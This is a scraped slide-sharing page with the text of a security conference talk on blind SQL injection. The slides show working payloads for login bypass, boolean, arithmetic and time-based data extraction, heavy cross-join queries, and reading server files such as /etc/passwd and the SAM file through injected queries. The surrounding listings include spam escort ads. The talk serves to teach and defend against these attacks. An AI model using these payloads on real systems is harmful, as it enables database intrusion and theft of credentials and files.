Python RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsPython RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutions
 
Exploring Symfony's Code
Exploring Symfony's CodeExploring Symfony's Code
Exploring Symfony's Code
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 

More from Chema Alonso

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitChema Alonso
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Chema Alonso
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoChema Alonso
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...Chema Alonso
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarChema Alonso
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with TacytChema Alonso
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordChema Alonso
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Chema Alonso
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of MagicChema Alonso
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackersChema Alonso
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Chema Alonso
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismoChema Alonso
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?Chema Alonso
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalChema Alonso
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con PythonChema Alonso
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Chema Alonso
 
Guía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRGuía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRChema Alonso
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaCurso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaChema Alonso
 

More from Chema Alonso (20)

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
 
Guía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRGuía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIR
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaCurso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
 

Recently uploaded

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Recently uploaded (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 

Playing With (B)Sqli

  • 1. (Re) Playingwith (Blind) SQL Injection Chema Alonso Informatica64 Microsoft MVP Enterprise Security
  • 2. SQL Injection attacks A long time ago, in a galaxyfar, faraway… http://www.phrack.org/issues.html?id=8&issue=54
  • 3. Back onthe 90s Select id fromusers_table wherelogin=‘$users’ and passw=‘$password’; User Password ****************
  • 4. Back onthe 90s Select id fromusers_table wherelogin=‘Admin’ and passw=‘’ or ‘1’=‘1’; User Admin Password ‘ or ‘1’=‘1
  • 6. ODBC Error messages Username: ' having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Username: ' group by users.id having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. And so on…
  • 8. Agenda Serialized SQL Injection Demo: XML Extractor Arithmetic SQL Injection Divide byZero Sums and subtractions Typeoveflow Demo RemoteFileDownloadingusingBlind SQL Injection SQL Sever MySQL Oracle Demo: RFD Tool Time-BasedBlind SQL Injectionusing heavy queries Demo: MarathonTool
  • 10. Serialized SQL Injection Goal: ToMergecomplexresultsets in a single showablefield XML serializationfunctionsallowtoconvert a resultsetinto a oneXML string. It´spossibletodownloadbigamount of data with single and simple injections.
  • 11. SQL Server FOR XML: Retrieves data as a single stringrepresentingan XML tree. RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. BINARY BASE64:The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. Described by DaniKachakil
  • 12. MySQL No default XML support, requires a server sideextension GROUP_CONCAT (v 4.1+)
  • 14. Demo: Serialized SQL Injection
  • 16. Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection
  • 17. Blind SQL Injection Attacks Attacker injects: “True where clauses” “False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database.
  • 18. Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “Different behavior” By example: Response Time
  • 19. Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
  • 21. ArithmeticBlind SQL Injection Thequeryforcestheparametertobenumeric SELECT field FROM table WHERE id=abs(param) Ex: GetParam(ID) Select ….. Where att1=abs(ID) Select ….. Where att2=k1-ID Print response Booleanlogicneedstobecreatedwithmathoperations
  • 22. ArithmeticBlind SQL Injection Divide byzero (David Litchfield) Id=A+(1/(ASCII(B)-C)) A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, the DB willgenerate a divide byzeroexception.
  • 23. ArithmeticBlind SQL Injection Sums and subtractions Id=A+ASCII(B)-C A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, thenthe response page of id=A+ASCII(B)-C willbethesame as id=A
  • 24. ArithmeticBlind SQL Injection Valuetypeoverflow Id=A+((C/ASCII(B))*(K)) A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] K-> Valuethatoverflowsthetypedefinedfor A (e.g.if A isinteger, then K=2^32) When C/ASCII(B)==1, K*1 overflowsthe data type
  • 25. Demo: Divide byzero Sums and subtractions Integeroverflow
  • 27. Accessing Files Two ways: Load the file in a temp table and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? Load the file in the query With every query the file is loaded in memory I am very sorry, engine  and i>ASCII(Substring(load_file(file,pos,1))??
  • 28. SQL Server 2K - External Data Sources Only for known filetypes: Access trough Drivers: Txt, csv, xls, mdb, log And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:','select top 1 * from c:irarget.txt’),1,1)) Privileges HKEY_LOCAL_MACHINEOFTWAREicrosoftSSQLServerrovidersisallowAdhocAccess=0 By default thiskeydoesn´texist so onlyuserswithServer Admin Role can use thesefunctions. NTFS permissions
  • 29. SQL Server 2K – Bulk option Access to any file ; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:ile.ext' With (FIELDTERMINATOR = '', ROWTERMINATOR = '‘) -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – and (select COUNT(row) from TempTable) and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable-- Privileges needed Server Role: Bulkadmin Database Role: db_owner o db_ddladmin NTFS permissions
  • 30. SQL Server 2k5 – 2k8 OPENDATASOURCE and OPENROWSET supported Bulk options improved AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:indowsepairam', SINGLE_BLOB) As Data), 1, 1))— Permisions Bulkadmin Server Role External Data Sources enabled Sp_configure Surface configuration Tool for features
  • 31. MySQL LoadFile SELECT LOAD_FILE(‘/etc/passwd’) SQLbfTools: MySQLgetcommand (illo and dab) http://www.reversing.org/node/view/11 Load Data infile ; Create table C8DFC643 (datosvarchar(4000)) ; Load data infile 'c:boot.ini' into table C8DFC643 ; alter table C8DFC643 add column num integer auto_increment unique key and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1) and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) ; Drop table C8DFC643
  • 32. Oracle – Plain Text files External Tables ; execute immediate 'Create Directory A4A9308C As ''c:amp;apos;' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- Only Plain Text files
  • 33. Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
  • 36. Time-Based Blind SQL Injection In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. Injection forces a delay in the response page when the condition injected is True. - Delay functions: SQL Server: waitfor Oracle: dbms_lock.sleep MySQL: sleep or Benchmark Function Postgres: pg_sleep Ex: ; if (exists(select * fromusers)) waitfordelay '0:0:5’
  • 37. Exploit for Solar Empire Web Game
  • 38. Time-Based Blind SQL Injection What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
  • 40. “Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
  • 43. Time-Based Blind SQL Injectionusing Heavy Queries Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. It depends on how the database engine evaluates the where clauses in the query. There are two types of database engines: Databases without optimization process Databases with optimization process
  • 44. Time-Based Blind SQL Injectionusing Heavy Queries Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. The Cross-join injection must be heavier than the other condition. Attacker only have to know or to guess the name of a table with select permission in the database. Example in MSSQL: Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 45. “Default” tablestoconstruct a heavy query Microsoft SQL Server sysusers Oracle all_users MySQL (versión 5) information_schema.columns Microsoft Access MSysAccessObjects (97 & 2000 versions) MSysAccessStorage (2003 & 2007) 45
  • 46. “Default” tablestoconstruct a heavy query …or whatever you can guess Clients Customers News Logins Users Providers ….Use your imagination…
  • 47. Ex 1: MS SQL Server Query takes 14 seconds -> True-Answer
  • 48. Ex 1: MS SQL Server Query takes 1 second -> False-Answer
  • 49. Ex 2: Oracle Query Takes 22 seconds –> True-Answer
  • 50. Ex 2: Oracle Query Takes 1 second –> False-Answer
  • 51. Ex 3: Access 2007 Query Takes 39 seconds –> True-Answer
  • 52. Ex 3: Access 2007 Query Takes 1 second –> False-Answer
  • 53. Marathon Tool Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. Schema Extraction from known databases Extract data using heavy queries not matter in which database engine (without schema) Developed in .NET Source code available http://www.codeplex.com/marathontool